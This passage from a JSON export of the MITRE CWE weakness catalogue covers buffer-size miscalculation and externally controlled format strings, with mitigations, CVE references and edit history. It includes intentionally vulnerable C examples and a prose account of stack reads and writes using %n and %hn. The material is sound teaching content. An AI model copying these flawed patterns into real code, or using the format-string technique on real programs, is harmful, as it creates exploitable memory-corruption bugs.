application."},{"attr":{"@_Mitigation_ID":"MIT-11"},"Phase":"Operation","Strategy":"Environment Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that randomly arrange the positions of a program\'s executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code.","Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-12"},"Phase":"Operation","Strategy":"Environment Hardening","Description":"Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [REF-61] [REF-60].","Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software\'s state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-26"},"Phase":"Implementation","Strategy":"Compilation or Build Hardening","Description":"Examine compiler warnings closely and eliminate problems with potential security implications, such as signed / unsigned mismatch in memory operations, or use of uninitialized variables. Even if the weakness is rarely exploitable, a single failure may lead to the compromise of the entire system."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-20"},"Intro_Text":"The following code allocates memory for a maximum number of widgets. It then gets a user-specified number of widgets, making sure that the user does not request too many. It then initializes the elements of the array using InitializeWidget(). Because the number of widgets can vary for each request, the code inserts a NULL pointer to signify the location of the last widget.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int i;unsigned int numWidgets;Widget **WidgetList;numWidgets = GetUntrustedSizeValue();if ((numWidgets == 0) || (numWidgets &gt; MAX_NUM_WIDGETS)) {}WidgetList = (Widget **)malloc(numWidgets * sizeof(Widget *));printf(\\"WidgetList ptr=%p\\\\n\\", WidgetList);for(i=0; i&lt;numWidgets; i++) {}WidgetList[numWidgets] = NULL;showWidgets(WidgetList);","xhtml:br":["","","","","","","","","",""],"xhtml:div":[{"#text":"ExitError(\\"Incorrect number of widgets requested!\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"WidgetList[i] = InitializeWidget();","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"However, this code contains an off-by-one calculation error (CWE-193). It allocates exactly enough space to contain the specified number of widgets, but it does not include the space for the NULL pointer. As a result, the allocated buffer is smaller than it is supposed to be (CWE-131). So if the user ever requests MAX_NUM_WIDGETS, there is an out-of-bounds write (CWE-787) when the NULL is assigned. Depending on the environment and compilation settings, this could cause memory corruption."},{"attr":{"@_Demonstrative_Example_ID":"DX-33"},"Intro_Text":"The following image processing code allocates a table for images.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"img_t table_ptr; /*struct containing img data, 10kB each*/int num_imgs;...num_imgs = get_num_imgs();table_ptr = (img_t*)malloc(sizeof(img_t)*num_imgs);...","xhtml:br":["","","","",""]}},"Body_Text":"This code intends to allocate a table of size num_imgs, however as num_imgs grows large, the calculation determining the size of the list will eventually overflow (CWE-190). This will result in a very small list to be allocated instead. If the subsequent code operates on the list as if it were num_imgs long, it may result in many types of out-of-bounds problems (CWE-119)."},{"attr":{"@_Demonstrative_Example_ID":"DX-19"},"Intro_Text":"This example applies an encoding procedure to an input string and stores it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char * copy_input(char *user_supplied_string){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int i, dst_index;char *dst_buf = (char*)malloc(4*sizeof(char) * MAX_SIZE);if ( MAX_SIZE &lt;= strlen(user_supplied_string) ){}dst_index = 0;for ( i = 0; i &lt; strlen(user_supplied_string); i++ ){}return dst_buf;","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"die(\\"user string too long, die evil hacker!\\");","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( \'&amp;\' == user_supplied_string[i] ){}else if (\'&lt;\' == user_supplied_string[i] ){}else dst_buf[dst_index++] = user_supplied_string[i];","xhtml:div":[{"#text":"dst_buf[dst_index++] = \'&amp;\';dst_buf[dst_index++] = \'a\';dst_buf[dst_index++] = \'m\';dst_buf[dst_index++] = \'p\';dst_buf[dst_index++] = \';\';","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"/* encode to &amp;lt; */"}}],"xhtml:br":["",""]}}]}}}},"Body_Text":"The programmer attempts to encode the ampersand character in the user-controlled string, however the length of the string is validated before the encoding procedure is applied. Furthermore, the programmer assumes encoding expansion will only expand a given character by a factor of 4, while the encoding of the ampersand expands by 5. As a result, when the encoding procedure expands the string it is possible to overflow the destination buffer if the attacker provides a string of many ampersands."},{"attr":{"@_Demonstrative_Example_ID":"DX-21"},"Intro_Text":"The following code is intended to read an incoming packet from a socket and extract one or more headers.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"DataPacket *packet;int numHeaders;PacketHeader *headers;sock=AcceptSocketConnection();ReadPacket(packet, sock);numHeaders =packet-&gt;headers;if (numHeaders &gt; 100) {}headers = malloc(numHeaders * sizeof(PacketHeader);ParsePacketHeaders(packet, headers);","xhtml:br":["","","","","","","","","",""],"xhtml:div":{"#text":"ExitError(\\"too many headers!\\");","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"The code performs a check to make sure that the packet does not contain too many headers. However, numHeaders is defined as a signed int, so it could be negative. If the incoming packet specifies a value such as -3, then the malloc calculation will generate a negative number (say, -300 if each header can be a maximum of 100 bytes). When this result is provided to malloc(), it is first converted to a size_t type. This conversion then produces a large value such as 4294966996, which may cause malloc() to fail or to allocate an extremely large amount of memory (CWE-195). With the appropriate negative numbers, an attacker could trick malloc() into using a very small positive number, which then allocates a buffer that is much smaller than expected, potentially leading to a buffer overflow."},{"Intro_Text":"The following code attempts to save three different identification numbers into an array. The array is allocated from memory using a call to malloc().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int *id_sequence;id_sequence = (int*) malloc(3);if (id_sequence == NULL) exit(1);id_sequence[0] = 13579;id_sequence[1] = 24680;id_sequence[2] = 97531;","xhtml:br":["","","","","","","","","","","","",""],"xhtml:i":["/* Allocate space for an array of three ids. */","/* Populate the id array. */"]}},"Body_Text":["The problem with the code above is the value of the size parameter used during the malloc() call. It uses a value of \'3\' which by definition results in a buffer of three bytes to be created. However the intention was to create a buffer that holds three ints, and in C, each int requires 4 bytes worth of memory, so an array of 12 bytes is needed, 4 bytes for each int. Executing the above code could result in a buffer overflow as 12 bytes of data is being saved into 3 bytes worth of allocated space. The overflow would occur during the assignment of id_sequence[0] and would continue with the assignment of id_sequence[1] and id_sequence[2].","The malloc() call could have used \'3*sizeof(int)\' as the value for the size parameter in order to allocate the correct amount of space required to store the three ints."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-1363","Description":"substitution overflow: buffer overflow using environment variables that are expanded after the length check is performed","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1363"},{"Reference":"CVE-2004-0747","Description":"substitution overflow: buffer overflow using expansion of environment variables","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0747"},{"Reference":"CVE-2005-2103","Description":"substitution overflow: buffer overflow using a large number of substitution strings","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2103"},{"Reference":"CVE-2005-3120","Description":"transformation overflow: product adds extra escape characters to incoming data, but does not account for them in the buffer length","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3120"},{"Reference":"CVE-2003-0899","Description":"transformation overflow: buffer overflow when expanding \\"&gt;\\" to \\"&amp;gt;\\", etc.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0899"},{"Reference":"CVE-2001-0334","Description":"expansion overflow: buffer overflow using wildcards","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0334"},{"Reference":"CVE-2001-0248","Description":"expansion overflow: long pathname + glob = overflow","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0248"},{"Reference":"CVE-2001-0249","Description":"expansion overflow: long pathname + glob = overflow","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0249"},{"Reference":"CVE-2002-0184","Description":"special characters in argument are not properly expanded","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0184"},{"Reference":"CVE-2004-0434","Description":"small length value leads to heap overflow","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0434"},{"Reference":"CVE-2002-1347","Description":"multiple variants","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1347"},{"Reference":"CVE-2005-0490","Description":"needs closer investigation, but probably expansion-based","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0490"},{"Reference":"CVE-2004-0940","Description":"needs closer investigation, but probably expansion-based","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0940"},{"Reference":"CVE-2008-0599","Description":"Chain: Language interpreter calculates wrong buffer size (CWE-131) by using \\"size = ptr ? X : Y\\" instead of \\"size = (ptr ? X : Y)\\" expression.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0599"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Other length calculation error"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT30-C","Entry_Name":"Ensure that unsigned integer operations do not wrap","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM35-C","Entry_Name":"Allocate sufficient memory for an object","Mapping_Fit":"CWE More Abstract"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"100"}},{"attr":{"@_CAPEC_ID":"47"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-106"}},{"attr":{"@_External_Reference_ID":"REF-107"}},{"attr":{"@_External_Reference_ID":"REF-58"}},{"attr":{"@_External_Reference_ID":"REF-61"}},{"attr":{"@_External_Reference_ID":"REF-60"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 20, &#34;Integer Overflows&#34; Page 620"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 5: Buffer Overruns.&#34; Page 89"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;Incrementing Pointers Incorrectly&#34;, Page 401"}},{"attr":{"@_External_Reference_ID":"REF-64"}}]},"Notes":{"Note":[{"attr":{"@_Type":"Maintenance"},"xhtml:p":["This is a broad category. Some examples include:","This level of detail is rarely available in public reports, so it is difficult to find good examples."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":{"xhtml:li":["simple math errors,","incorrectly updating parallel counters,","not accounting for size differences when \\"transforming\\" one input to another format (e.g. URL canonicalization or other transformation that can generate a result that\'s larger than the original input, i.e. \\"expansion\\")."]}}},{"attr":{"@_Type":"Maintenance"},"xhtml:p":["This weakness may be a composite or a chain. It also may contain layering or perspective differences.","This issue may be associated with many different types of incorrect calculations (CWE-682), although the integer overflow (CWE-190) is probably the most prevalent. This can be primary to resource consumption problems (CWE-400), including uncontrolled memory allocation (CWE-789). However, its relationship with out-of-bounds buffer access (CWE-119) must also be considered."]}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Maintenance_Notes, Relationships, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Likelihood_of_Exploit, Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Detection_Factors, Maintenance_Notes, Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Detection_Factors, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Other Length Calculation Error","attr":{"@_Date":"2008-01-30"}}}},"132":{"attr":{"@_ID":"132","@_Name":"DEPRECATED: Miscalculated Null Termination","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because it was a duplicate of CWE-170. All content has been transferred to CWE-170.","Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Common_Consequences, Description, Likelihood_of_Exploit, Name, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Name"}],"Previous_Entry_Name":[{"#text":"Miscalculated Null Termination","attr":{"@_Date":"2008-09-09"}},{"#text":"DEPRECATED (Duplicate): Miscalculated Null Termination","attr":{"@_Date":"2021-07-20"}}]}},"134":{"attr":{"@_ID":"134","@_Name":"Use of Externally-Controlled Format String","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses a function that accepts a format string as an argument, but the format string originates from an external source.","Extended_Description":{"xhtml:p":["When an attacker can modify an externally-controlled format string, this can lead to buffer overflows, denial of service, or data representation problems.","It should be noted that in some circumstances, such as internationalization, the set of format strings is externally controlled by design. If the source of these format strings is trusted (e.g. only contained in library files that are only modifiable by the system administrator), then the external control might not itself pose a vulnerability."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"123","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Rarely"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"The programmer rarely intends for a format string to be externally-controlled at all. This weakness is frequently introduced in code that constructs log messages, where a constant format string is omitted."},{"Phase":"Implementation","Note":"In cases such as localization and internationalization, the language-specific message repositories could be an avenue for exploitation, but the format string issue would be resultant, since attacker control of those repositories would also allow modification of message length, format, and content."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory","Note":"Format string problems allow for information disclosure which can severely simplify exploitation of the program."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Modify Memory","Execute Unauthorized Code or Commands"],"Note":"Format string problems can result in the execution of arbitrary code."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":"This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives."},{"Method":"Black Box","Description":"Since format strings often occur in rarely-occurring erroneous conditions (e.g. for error message logging), they can be difficult to detect using black box methods. It is highly likely that many latent issues exist in executables that do not have associated source code (or equivalent source.","Effectiveness":"Limited"},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode simple extractor - strings, ELF readers, etc."}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Warning Flags"}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Choose a language that is not subject to this flaw."},{"Phase":"Implementation","Description":"Ensure that all format string functions are passed a static string which cannot be controlled by the user, and that the proper number of arguments are always sent to that function as well. If at all possible, use functions that do not support the %n operator in format strings. [REF-116] [REF-117]"},{"Phase":"Build and Compilation","Description":"Run compilers and linkers with high warning levels, since they may detect incorrect usage."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following program prints a string provided as an argument.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include &lt;stdio.h&gt;void printWrapper(char *string) {}int main(int argc, char **argv) {}","xhtml:br":["","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"printf(string);","xhtml:br":""}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char buf[5012];memcpy(buf, argv[1], 5012);printWrapper(argv[1]);return (0);","xhtml:br":["","","",""]}}]}},"Body_Text":"The example is exploitable, because of the call to printf() in the printWrapper() function. Note: The stack buffer was added to make exploitation more simple."},{"Intro_Text":"The following code copies a command line argument into a buffer using snprintf().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main(int argc, char **argv){}","xhtml:div":{"#text":"char buf[128];...snprintf(buf,128,argv[1]);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"This code allows an attacker to view the contents of the stack and write to the stack using a command line argument containing a sequence of formatting directives. The attacker can read from the stack by providing more formatting directives, such as %x, than the function takes as arguments to be formatted. (In this example, the function takes no arguments to be formatted.) By using the %n formatting directive, the attacker can write to the stack, causing snprintf() to write the number of bytes output thus far to the specified argument (rather than reading a value from the argument, which is the intended behavior). A sophisticated version of this attack will use four staggered writes to completely control the value of a pointer on the stack."},{"Intro_Text":"Certain implementations make more advanced attacks even easier by providing format directives that control the location in memory to read from or write to. An example of these directives is shown in the following code, written for glibc:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":"printf(\\"%d %d %1$d %1$d\\\\n\\", 5, 9);"},"Body_Text":"This code produces the following output: 5 9 5 5 It is also possible to use half-writes (%hn) to accurately control arbitrary DWORDS in memory, which greatly reduces the complexity needed to execute an attack that would otherwise require four staggered writes, such as the one mentioned in the first example."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1825","Description":"format string in Perl program","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1825"},{"Reference":"CVE-2001-0717","Description":"format string in bad call to syslog function","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0717"},{"Reference":"CVE-2002-0573","Description":"format string in bad call to syslog function","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0573"},{"Reference":"CVE-2002-1788","Description":"format strings in NNTP server responses","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1788"},{"Reference":"CVE-2006-2480","Description":"Format string vulnerability exploited by triggering errors or warnings, as demonstrated via format string specifiers in a .bmp filename.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2480"},{"Reference":"CVE-2007-2027","Description":"Chain: untrusted search path enabling resultant format string by loading malicious internationalization messages","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2027"}]},"Functional_Areas":{"Functional_Area":["Logging","Error Handling","String Processing"]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Format string vulnerability"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Format String"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Format string problem"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO30-C","Entry_Name":"Exclude user input from format strings","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO47-C","Entry_Name":"Use valid format strings","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":6,"Entry_Name":"Format String"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS06-J","Entry_Name":"Exclude user input from format strings"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"IDS30-PL","Entry_Name":"Exclude user input from format strings","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"},{"attr":{"@_Taxonomy_Name":"OMG 